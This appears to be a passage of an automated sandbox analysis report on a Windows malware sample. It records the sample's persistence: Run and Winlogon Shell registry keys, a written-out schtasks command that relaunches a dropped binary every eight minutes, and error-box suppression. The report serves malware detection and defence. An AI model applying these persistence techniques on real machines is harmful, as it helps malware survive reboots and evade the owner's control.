                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile created: C:\Users\user\Desktop\AjJOuhvp.logJump to dropped file
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeFile created: C:\Users\user\Desktop\atZTrSKs.logJump to dropped file

                                    Boot Survival

                                    barindex
                                    Creates an autostart registry key pointing to binary in C:\Windows
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Creates an undocumented autostart registry key
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Creates multiple autostart registry keys
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bridgeportDhcpcommonJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SearchAppJump to behavior
                                    Uses schtasks.exe or at.exe to add and modify task schedules
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Recovery\SearchApp.exe'" /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SearchAppJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SearchAppJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bridgeportDhcpcommonJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bridgeportDhcpcommonJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bridgeportDhcpcommonJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bridgeportDhcpcommonJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeProcess information set: NOOPENFILEERRORBOX
